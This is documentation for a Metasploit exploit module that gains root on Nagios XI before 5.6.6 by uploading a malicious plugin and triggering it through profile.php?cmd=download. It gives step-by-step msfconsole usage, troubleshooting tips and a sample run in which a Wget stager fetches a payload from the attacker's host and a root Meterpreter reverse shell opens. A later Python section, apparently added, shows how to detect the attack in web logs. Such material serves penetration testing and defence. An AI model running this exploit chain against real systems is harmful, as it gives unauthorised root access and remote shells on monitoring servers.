metasploit-gs/documentation/modules/exploit/linux/http/nagios_xi_authenticated_rce.md
2020-03-09 11:56:15 +02:00

Introduction

This module exploits a vulnerability in Nagios XI before 5.6.6 in order to execute arbitrary commands as root.

The module first checks if the supplied credentials are valid and belong to a user with permissions to modify plugins. It then exploits these permissions by uploading a malicious plugin to the target and subsequently sending an HTTP GET request to profile.php?cmd=download. This request downloads a system profile from the server and in the process launches the getprofile.sh script as root via a passwordless sudo entry. This script executes the malicious plugin as root.

For all supported targets except Linux (cmd), the module uses a command stager to write the exploit to the target via the malicious plugin. However, this method may not work if Nagios XI is running in a restricted Unix environment like a minimal/custom CentOS installation. In the latter case, the target must be set to Linux (cmd). For this target, the module writes the payload directly to the malicious plugin while avoiding commands that may not be supported in a restricted environment. It is recommended to use the target's default cmd/unix/reverse_bash payload in this scenario.

If the target is found to be vulnerable but the module completes without establishing a session, try increasing the value of WfsDelay (the additional delay when waiting for a session). The default value of this advanced option is 10 seconds. To check it, run show advanced. Other possible solutions are changing the payload, manually setting the value of the CMDSTAGER::FLAVOR advanced option, and setting the target to Linux (cmd) as explained above.

Valid credentials for a user with administrative privileges are required. This module was successfully tested on Nagios XI 5.6.5 running on CentOS 7. Please note that the module may behave differently when run against older versions of Nagios XI. For instance, during a test against Nagios XI 5.4.10, the module failed to trigger execution of the payload. Instead, the payload was executed randomly after a period of time (up to 5 minutes). Moreover, the session that was ultimately established was not a root session.
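The plugin upload followed by a profile download described above leaves a recognisable trace in the web server's access log, and the affected version range is easy to get wrong with string comparison. The following Python is an added detection example, not code from the Metasploit module or from Nagios XI; the log lines are constructed, and the /nagiosxi base path and the admin/monitoringplugins.php upload page are assumptions about the Nagios XI UI (only profile.php?cmd=download and the 5.6.6 boundary come from the page).

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-format log lines (not real traffic). The /nagiosxi
# base path and the admin/monitoringplugins.php upload page are assumptions
# about the Nagios XI UI; profile.php?cmd=download is the trigger named in the doc.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Feb/2020:16:27:40 +0100] "GET /nagiosxi/login.php HTTP/1.1" 200 512
10.0.0.5 - - [27/Feb/2020:16:27:42 +0100] "POST /nagiosxi/admin/monitoringplugins.php HTTP/1.1" 302 0
10.0.0.5 - - [27/Feb/2020:16:27:45 +0100] "GET /nagiosxi/profile.php?cmd=download HTTP/1.1" 200 20480
10.0.0.9 - - [27/Feb/2020:16:30:00 +0100] "GET /nagiosxi/profile.php?cmd=download HTTP/1.1" 200 20480
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*"'
)

def parse(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "method": m["method"], "path": m["path"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")}

def is_affected_version(version):
    """Nagios XI before 5.6.6; compare numerically so 5.10.x is not 'below' 5.6.6."""
    return tuple(int(p) for p in version.split(".")) < (5, 6, 6)

def find_plugin_then_profile(log_text, window=timedelta(minutes=5)):
    """Return (ip, upload_ts, download_ts) for each client whose
    profile.php?cmd=download request follows its own POST to a plugin page
    within `window`. A lone profile download (10.0.0.9 above) is not flagged."""
    hits, last_upload = [], {}
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and "plugin" in ev["path"].lower():
            last_upload[ev["ip"]] = ev["ts"]
        elif "profile.php" in ev["path"] and "cmd=download" in ev["path"]:
            up = last_upload.get(ev["ip"])
            if up is not None and ev["ts"] - up <= window:
                hits.append((ev["ip"], up, ev["ts"]))
    return hits
```

On a live system the same correlation can be fed from the Apache access log of the Nagios XI host; an outbound fetch from that host to an unfamiliar address shortly after the download request (the Wget request visible in the module output) is the complementary network-side indicator.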

Vulnerable system

Nagios XI before 5.6.6.

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/linux/http/nagiosxi_authenticated_rce
  4. Do: set RHOSTS [IP]
  5. Do: set SRVHOST [IP]
  6. Do: set USERNAME [username]
  7. Do: set PASSWORD [password]
  8. Do: set payload [payload]
  9. Do: set LHOST [IP]
  10. Do: set LPORT [port]
  11. Do: exploit

Options

  1. USERNAME. The username to authenticate with. This user should have permissions to modify plugins. The default setting is nagiosadmin, which is the default admin account for Nagios XI systems.
  2. PASSWORD. The password to authenticate with.

Targets

  1. Linux (x86)
  2. Linux (x64) # This is the default target.
  3. Linux (cmd) # If wget is not installed on the target, this target should be selected together with the payload cmd/unix/reverse_bash.

Scenarios

msf5 exploit(linux/http/nagiosxi_authenticated_rce) > show options

Module options (exploit/linux/http/nagiosxi_authenticated_rce):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   PASSWORD   P@ssw0rd!             yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.1           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                    yes       The target port (TCP)
   SRVHOST    192.168.1.2           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                     yes       Base path to NagiosXI
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin           yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)


msf5 exploit(linux/http/nagiosxi_authenticated_rce) > run
[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Found Nagios XI application with version 5.6.5.
[*] Using URL: http://192.168.1.2:8080/eFFP5lYvZ8eCnR0
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100% done (121/121 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting for the plugin to request the final payload...
[*] Client 192.168.1.1 (Wget/1.14 (linux-gnu)) requested /eFFP5lYvZ8eCnR0
[*] Sending payload to 192.168.1.1 (Wget/1.14 (linux-gnu))
[*] Sending stage (3021284 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:56510) at 2020-02-27 16:27:49 +0100
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

References

  1. https://github.com/jakgibb/nagiosxi-root-rce-exploit
  2. https://nvd.nist.gov/vuln/detail/CVE-2019-15949